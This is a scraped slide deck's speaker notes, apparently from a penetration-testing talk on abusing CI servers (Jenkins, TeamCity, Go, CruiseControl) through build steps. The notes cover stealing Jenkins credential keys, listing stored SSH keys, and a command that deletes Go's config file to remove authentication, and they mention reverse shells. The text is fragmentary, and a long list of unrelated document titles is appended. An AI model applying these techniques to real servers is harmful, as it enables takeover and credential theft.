More about Continuous Integration: http://www.martinfowler.com/articles/continuousintegration.html



Similar documents
SEAGATE BUSINESS NAS ACCESSING THE SHELL. February 1, 2014 by Jeroen Diel IT Nerdbox

Mapping ITS s File Server Folder to Mosaic Windows to Publish a Website

DIGIPASS Pack for Citrix on WI 4.5 does not detect a login attempt. Creation date: 28/02/2008 Last Review: 04/03/2008 Revision number: 2

Hadoop Data Warehouse Manual

Basic User Guide for the IAS VPN (

Livezilla How to Install on Shared Hosting By: Jon Manning

NTT Web Hosting Service [User Manual]

BioDiscovery Product Activation Group Floating Windows

Brivo Directory Agent. User Guide

Acunetix Web Vulnerability Scanner. Getting Started. By Acunetix Ltd.

Click Studios. Passwordstate. Password Discovery, Reset and Validation. Requirements

TECHNICAL NOTE. The following information is provided as a service to our users, customers, and distributors.

Integrating SAP BusinessObjects with Hadoop. Using a multi-node Hadoop Cluster

IIS, FTP Server and Windows

NAS 109 Using NAS with Linux

Snow Active Directory Discovery

Tool Tip. SyAM Management Utilities and Non-Admin Domain Users

SQL Server Setup for Assistant/Pro applications Compliance Information Systems

Using Network Attached Storage with Linux. by Andy Pepperdine

SCADA Security. Enabling Integrated Windows Authentication For CitectSCADA Web Client. Applies To: CitectSCADA 6.xx and 7.xx VijeoCitect 6.xx and 7.

Active Directory Self-Service FAQ

Extending Remote Desktop for Large Installations. Distributed Package Installs

How To Run Anolicense Server On A Windows 7.5 (For Free) Or 8 (For Ubuntu) Or For Free (For Microsoft) (For Linux) (Or For Free) ( For

Using Microsoft Windows Authentication for Microsoft SQL Server Connections in Data Archive

Managed Devices - Web Browser/HiView

MySQL quick start guide

Active Directory Management. Agent Deployment Guide

Secure Messaging Server Console... 2

Configure Backup Server for Cisco Unified Communications Manager

Connecting to the School of Computing Servers and Transferring Files

How to Backup XenServer VM with VirtualIQ

FortyCloud Installation Guide. Installing FortyCloud Gateways Using AMIs (AWS Billing)

Video Administration Backup and Restore Procedures

S/Medicine Mac OS X Domain Binding Instructions

Expresso Quick Install

Using MailStore to Archive MDaemon

CafePilot has 3 components: the Client, Server and Service Request Monitor (or SRM for short).

Installing, Uninstalling, and Upgrading Service Monitor

HIPAA Compliance Use Case

Volume SYSLOG JUNCTION. User s Guide. User s Guide

Marcum LLP MFT Guide

<Insert Picture Here> Hudson Security Architecture. Winston Prakash. Click to edit Master subtitle style

Cloud Control Panel (CCP) Installation Guide

Intelligent Power Protector User manual extension for Microsoft Virtual architectures: Hyper-V 6.0 Manager Hyper-V Server (R1&R2)

Linko Software Express Edition Typical Installation Guide

Dell UPS Local Node Manager USER'S GUIDE EXTENSION FOR MICROSOFT VIRTUAL ARCHITECTURES Dellups.com

Configuration Guide - OneDesk to SalesForce Connector

Jive Connects for Microsoft SharePoint: Troubleshooting Tips

Laboration 3 - Administration

First Steps after Installation Guide

Administrative Guide VtigerCRM Microsoft Exchange Connector (Exchange Server 2010)

Setting Up Specify to use a Shared Workstation as a Database Server

Only LDAP-synchronized users can access SAML SSO-enabled web applications. Local end users and applications users cannot access them.

Linux VPS with cpanel. Getting Started Guide

Knowledge Base Article: Article 218 Revision 2 How to connect BAI to a Remote SQL Server Database?

FTP Accounts Contents

Enterprise Self Service Quick start Guide

Configuring Cisco CallManager IP Phones to Work With IP Phone Agent

CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities

SOA Software API Gateway Appliance 7.1.x Administration Guide

GETTING STARTED WITH FLEXI-CLOUD

How To Set Up Chime For A Coworker On Windows (Windows) With A Windows 7 (Windows 7) On A Windows 8.1 (Windows 8) With An Ipad (Windows).Net (Windows Xp

VERALAB LDAP Configuration Guide

1. Installation Overview

Installation Guide. Research Computing Team V1.9 RESTRICTED

How to install IDA floating licenses on a Windows server

NetIQ Advanced Authentication Framework - MacOS Client

Active Directory Installation on Windows Server 2012

SonicWALL CDP 5.0 Microsoft Exchange User Mailbox Backup and Restore

QUICK INSTALLATION GUIDE ACTIVATE

Cloud Services ADM. Agent Deployment Guide

LiteCommerce 2Checkout.com Module

Content Management System

HotelTV2. Easy Start Guide REV A0.6 D October. Web : Mail : support@vestek.com.tr Tel :

Management, Logging and Troubleshooting

Virtual Code Authentication User s Guide. June 25, 2015

educ Office Remove & create new Outlook profile

Analyze Traffic with Monitoring Interfaces and Packet Forwarding

User Permissions Published on Panopto Support (

Setup Guide for AD FS 3.0 on the Apprenda Platform

Introduction. Installation of SE S AM E BARCODE virtual machine distribution. (Windows / Mac / Linux)

About This Document 3. About the Migration Process 4. Requirements and Prerequisites 5. Requirements... 5 Prerequisites... 5

Propalms TSE Quickstart Guide

TestElite - Troubleshooting

Installation Overview

Binding an OS X computer to Active Directory at NEIU (Existing User)

Setting up VMware Server v1 for 2X VirtualDesktopServer Manual

VMware vcenter Support Assistant 5.1.1

Using and Contributing Virtual Machines to VM Depot

Deploying BitDefender Client Security and BitDefender Windows Server Solutions

Active Directory integration with CloudByte ElastiStor

Field Description Example. IP address of your DNS server. It is used to resolve fully qualified domain names

These notes are for upgrading the Linko Version 9.3 MS Access database to a SQL Express 2008 R2, 64 bit installations:

USER GUIDE WWPass Security for (Outlook) For WWPass Security Pack 2.4

User Roles & Adding Domains & Users

Download and Install the Citrix Receiver for Mac/Linux

aims sql server installation guide

PowerShell Configuration Guide

Running 4D Server as a Service on Windows

Transcription:

1

2

3

4

More about Continuous Integration: http://www.martinfowler.com/articles/continuousintegration.html 5

6

7

* Hudson was not evaluated separately. Most of the things which apply on Jenkins should apply on Hudson as well. 8

9

10

11

http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilegeesc-jenkins.html 12

The rights of the user to add or change build configuration are managed using Matrix based security or Project-based Matrix Authorization Strategy. https://wiki.jenkins-ci.org/display/jenkins/matrix-based+security When running commands on a Windows machine we can leverage PowerShell to execute advanced scripts using this method. 13

The Jenkins service must be restarted after that. During the tests, I was unable to successfully restart the Jenkins service from a build step even on Windows (with SYSTEM privileges). The workaround is to have an interactive reverse shell on the host machine and restart Jenkins service. Jenkins documentation on Disabling Security https://wiki.jenkins-ci.org/display/jenkins/disable+security 14

https://imgflip.com/memegenerator/surprised-koala 15

Taken from http://thiébaud.fr/jenkins_credentials.html 16

We need credentials.xml from $JENKINS_HOME and master.key and hudson.util.secret from $JENKINS_HOME/secrets/ We are reading the keys master.key and hudson.util.secret in bytes and will convert them back to file on our own machine. On a Windows machine the conversion could be done by using TextToExe.ps1 from Nishang. https://github.com/samratashok/nishang/blob/master/utility/texttoexe.ps1 17

18

19

20

21

https://confluence.jetbrains.com/display/tcd9/getting+started 22

https://confluence.jetbrains.com/pages/viewpage.action?pageid=54334889#howto...-teamcitysecuritynotes 23

24

https://confluence.jetbrains.com/display/tcd9/role+and+permission Teamcity documentation recommends not to have build agent on master but looks like only few care about that. 25

A Build Step could be added with the Project Administrator or even lower privileges (if configured that way). PowerShell commands and scripts could be executed using the PowerShell runner. https://confluence.jetbrains.com/display/tcd9/powershell On *nix machines, shell commands and scripts could be executed. 26

https://confluence.jetbrains.com/display/tcd9/super+user Fun Fact: You can lock out SuperUser for one minute by clicking Log in button five times without entering a Username and Password. This makes it easy to block it by repeating login requests indefinitely. 27

28

29

https://confluence.jetbrains.com/display/tcd9/ssh+keys+management Here is how it could be done: 1. To know the data directory of the master, look for Data Directory in the teamcity-server.log. Use a PowerShell runner. 2. Use cat <TeamCity Data Directory>\config\projects\<project>\pluginData\ssh_keys\ * to list contents of all the keys. 30

31

Teamcity supports using the Password type Parameter for passwords but I have seen so many users using Text Parameter for passwords. See: https://confluence.jetbrains.com/display/tcd9/typed+parameters 32

33

Couple of examples of credentials in Build Logs. In both the above screenshots, access to public instances and the Build Logs is with Guest privileges. 34

35

http://www.go.cd/ http://www.thoughtworks.com/products/go-continuous-delivery 36

http://support.thoughtworks.com/entries/22299328-go-security-questions 37

38

http://support.thoughtworks.com/entries/22873043-go-s-custom-command http://www.go.cd/documentation/user/current/advanced_usage/command_reposito ry.html 39

We need Pipeline Group Administrator rights to be able to configure Jobs which can run custom commands. 40

41

In above, the command cmd /c powershell -c del 'C:\Program Files (x86)\go Server\config\cruise-config.xml will remove the configuration file of Go. The command cmd /c powershell c Restart-Service 'Go Server will restart the Go Server service. After this, all security will be removed from the Go dashboard and anyone who knows the URL will have admin rights. Instead of removing the cruise-config.xml file, we can also remove only the <security></security> part of it and restart the Go Server service for same effect. Or we can add the current user to <admins> in the <security> part of cruiseconfig.xml 42

43

Documentation on using password files: http://www.go.cd/documentation/user/current/configuration/dev_authentication.ht ml https://github.com/gocd/gocd/blob/master/manualtesting/ant_hg/password.properties Location of SSH keys is: C:/Program Files (x86)/go Server/%HOMEDRIVE%%HOMEPATH%/.ssh /var/go/.ssh on Linux 44

45

46

47

48

Documentation for the exec builder: http://cruisecontrol.sourceforge.net/main/configxml.html#exec 49

50

51

52

Also see: https://github.com/foxglovesec/javaunserializeexploits https://github.com/frohoff/ysoserial 53

I am using an encoded one line PowerShell reverse shell from Nishang as the payload in the above screenshot. (https://github.com/samratashok/nishang/blob/master/shells/invoke- PowerShellTcpOneLine.ps1) 54

55

56

57

58

59

60

61

62

63

64

65

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information